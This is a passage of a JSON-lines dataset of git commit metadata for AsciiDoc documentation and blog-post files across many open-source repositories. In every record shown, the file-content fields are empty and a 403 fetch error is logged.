With?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-04-Has-Your-Drink-Been-Tampered-With.adoc","new_file":"_posts\/2017-08-04-Has-Your-Drink-Been-Tampered-With.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8be2a43d527687e7568dc86fee6b11bee994c5e9","subject":"Rename SystemArchitecture aspect to CommonPointcuts in AOP ref doc","message":"Rename SystemArchitecture aspect to CommonPointcuts in AOP ref doc\n\nSee gh-25357\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f67a8be16052353afb2032104d31e2d4796b61e","subject":"update title","message":"update 
title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/pages\/now.adoc","new_file":"content\/pages\/now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26ccdd2eea24660f5c25e71ff58320d65899b44a","subject":"guide for jbang integration","message":"guide for jbang integration\n\nCo-authored-by: George Gastaldi <94a145309f176a79f8cd943f168fb7aaebdbfc96@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d449278d65663daf42d49f0ca56ba94321a23507","subject":"y2b create post 11\\","message":"y2b create post 11\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-15-11.adoc","new_file":"_posts\/2011-04-15-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0dedf8329196e1c9e6061621be24f0e4f6d4ddb","subject":"added principle","message":"added principle\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/principle.adoc","new_file":"doc\/MML4\/principle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d5b9886b4ba2cc77997a291960d3faeb7b7e716","subject":"client manual setup and API documentation","message":"client manual setup and API documentation\n","repos":"advancedtelematic\/rvi_sota_client,PDXostc\/rvi_sota_client,PDXostc\/rvi_sota_client,advancedtelematic\/rvi_sota_client","old_file":"docs\/client-guide.adoc","new_file":"docs\/client-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PDXostc\/rvi_sota_client.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"d4a919effe9525bae3b3614791d7b28cdd5e7416","subject":"Update 2015-11-12-Tableau-Spark-Cassandra.adoc","message":"Update 2015-11-12-Tableau-Spark-Cassandra.adoc","repos":"victorcouste\/blog,victorcouste\/blog,victorcouste\/blog","old_file":"_posts\/2015-11-12-Tableau-Spark-Cassandra.adoc","new_file":"_posts\/2015-11-12-Tableau-Spark-Cassandra.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/victorcouste\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9574f559f0f1927f42a5391e193fc5321553547d","subject":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","message":"Update 
2018-01-10-Neo4j-Commercial-Prices.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca8b8d7e66ae9dd95621a184b39fd3f2fc890f82","subject":"Update 2015-08-31-APISpark-and-Google-Sheets.adoc","message":"Update 2015-08-31-APISpark-and-Google-Sheets.adoc","repos":"codetricity\/journey,codetricity\/journey,codetricity\/journey","old_file":"_posts\/2015-08-31-APISpark-and-Google-Sheets.adoc","new_file":"_posts\/2015-08-31-APISpark-and-Google-Sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codetricity\/journey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958b6fe28061989ef135176d5b4db5e57d0a1ff6","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98685eb5c8cef58ef16598505c7b4c711768f2ed","subject":"Update 2017-10-11-use-storage-service-safely.adoc","message":"Update 2017-10-11-use-storage-service-safely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee53d5b43683de5be1cf676c55f082a8ddcf9ccb","subject":"Rough draft of new HSM provisioning doc.","message":"Rough draft of new HSM provisioning doc.\n\nIt's basically the same as the implicit provisioning doc but with a few\nfile names changed as necessary.\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/hsm-provisioning.adoc","new_file":"docs\/hsm-provisioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"4031c8f26f8cc244e362c088597c54ff759dbb88","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-reporter-es","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-reporter-es.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81ccbb2f425e7d13e855676a1078f8e35b93d70b","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c16244683a80733a925df16f97110204f2277adf","subject":"Added release notes for 2.13.0.Final","message":"Added release notes for 2.13.0.Final\n","repos":"agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,forge\/docs","old_file":"news\/2014-12-15-forge-2.13.0.final.asciidoc","new_file":"news\/2014-12-15-forge-2.13.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"10f547bceec23c3e0155964a7532ee026f9d653b","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3baa99e6bdf821d973725c81e82e714f3438f6","subject":"Update 2016-06-18-Euro-Watching-Engineering.adoc","message":"Update 2016-06-18-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef246e850fa206133b668ef3a3773ac4f1309e6d","subject":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","message":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7003515007629a12539d16008b1e28f6c18170","subject":"created v1 of the installation\/config guide","message":"created v1 of the installation\/config 
guide\n","repos":"msavy\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman-guides,apiman\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,ssogabe\/apiman-guides,msavy\/apiman-guides,apiman\/apiman,apiman\/apiman","old_file":"installation-guide\/en-US\/Guide.asciidoc","new_file":"installation-guide\/en-US\/Guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05ece56ccfb9318e7fb2ab29e5286f2c6d4f73fe","subject":"- introduction to arduino workshop initial commit","message":"- introduction to arduino workshop initial commit\n","repos":"davidkirwan\/workshops,semkr\/workshops,davidkirwan\/workshops,semkr\/workshops","old_file":"introduction_to_arduino\/README.asciidoc","new_file":"introduction_to_arduino\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"138590133e6b2ed6c9ca8040a77578821a23de6f","subject":"Contributing guide updated.","message":"Contributing guide updated.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f76eb82f981bbd39c65b9abdab5b7435dfe3bba","subject":"doc(CONTRIBUTORS): added a CONTRIBUTORS.adoc file","message":"doc(CONTRIBUTORS): added a CONTRIBUTORS.adoc file\n","repos":"michelangelo13\/ccw,laurentpetit\/ccw,laurentpetit\/ccw,noncom\/ccw,noncom\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,ccw-ide\/ccw,michelangelo13\/ccw,michelangelo13\/ccw,noncom\/ccw,ccw-ide\/ccw","old_file":"CONTRIBUTORS.adoc","new_file":"CONTRIBUTORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"59933db79d30a9619ae5e390875c1bf49932ed86","subject":"README","message":"README\n","repos":"vencik\/algorithm,vencik\/algorithm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vencik\/algorithm.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"64af3ab5a44dd3555a150686cccc5afdc1d36c21","subject":"[examples] add readme to webserver example","message":"[examples] add readme to webserver example\n","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"examples\/webserver\/README.adoc","new_file":"examples\/webserver\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoogleContainerTools\/skaffold.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"508340ce60d1317b149fe612ea70c3c5eb824f79","subject":"Update 
2015-09-04-Turing-Machine.adoc","message":"Update 2015-09-04-Turing-Machine.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"101739c7bec60a6d5cf9172fcb0714819a5c7b53","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba3eb37f8beb321d11452d8c1a7297347a9ed054","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdfa2b75035d32a2be2b0ed55267d1409962733","subject":"Explicitly load library with Quicklisp","message":"Explicitly load library with Quicklisp\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6dc8ec1c9b19e7e40c4b2d53b5d50d23c33e32be","subject":"Update 2016-03-13-Debugging-mesos-with-sysdig.adoc","message":"Update 2016-03-13-Debugging-mesos-with-sysdig.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-13-Debugging-mesos-with-sysdig.adoc","new_file":"_posts\/2016-03-13-Debugging-mesos-with-sysdig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05a34ce97de49301b4a1dcb7c5931897d6dab0d1","subject":"adds sample of emoji","message":"adds sample of emoji\n","repos":"taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab","old_file":"lib\/emoji-inline-macro\/emoji.adoc","new_file":"lib\/emoji-inline-macro\/emoji.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/taky\/asciidoctor-extensions-lab.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40585e7b37e20b1507a1721577f54e2ec60a46c1","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60573e4ec5e5bccb1b33871ca06bc130d5a0ca6c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d80925407ab9453c0b0eaa540b35abab722ae4cf","subject":"Update 2016-12-14-Autonomous-Cars.adoc","message":"Update 2016-12-14-Autonomous-Cars.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-Autonomous-Cars.adoc","new_file":"_posts\/2016-12-14-Autonomous-Cars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cdf9d78e9b85dc6f47ce34e0e1fd63e3f430336","subject":"adding --parallel for pulling images","message":"adding --parallel for pulling images\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9faafea74af52c93e0a3b2517eadfbfba6980f2e","subject":"fix https:\/\/github.com\/docker\/labs\/issues\/241","message":"fix https:\/\/github.com\/docker\/labs\/issues\/241\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54125db43b942be713c3be961dfa3ecb203bff84","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-karma\/README.adoc","new_file":"plugins\/boteco-plugin-karma\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97edced06be3ed495f1b07928944ea60e6b3338b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3260c9bcebc3e5d5da940a849c73d94248b49046","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b4bdfd8e8bc191b043153d1a6e1431c1cb9e00b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f94c335f574c4402e038c388cb2ddaa5da2c7368","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0d7a4421713568efda8dbbda33a53594a23b8e","subject":"Updated docs","message":"Updated docs\n","repos":"k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa0f1c6e60881c3d356412db2d1082799cd9f1d4","subject":"Remove cmake installation requirement from README","message":"Remove cmake installation requirement from 
README\n\nThis has been in thirdparty for a long time.\n\nChange-Id: Ib2ab0b07abf2a351dc7d1c8fa696d1ce0678ba5d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/932\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5c06c3c036b69eab8d60f7aa667075efeb5a557","subject":"add asciidoc link for readme","message":"add asciidoc link for readme\n","repos":"Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"87018a4d5bd992e5b19f88d7695790ab0a7dafd6","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"0c502e96d4a9dc2cce5a8caabac8b89e9b0df69e","subject":"CL note - get cwd with UIOP","message":"CL note - get cwd with UIOP\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"094bdd131bf1c32c0fd8c0e8ddb5ec572bc7cd76","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
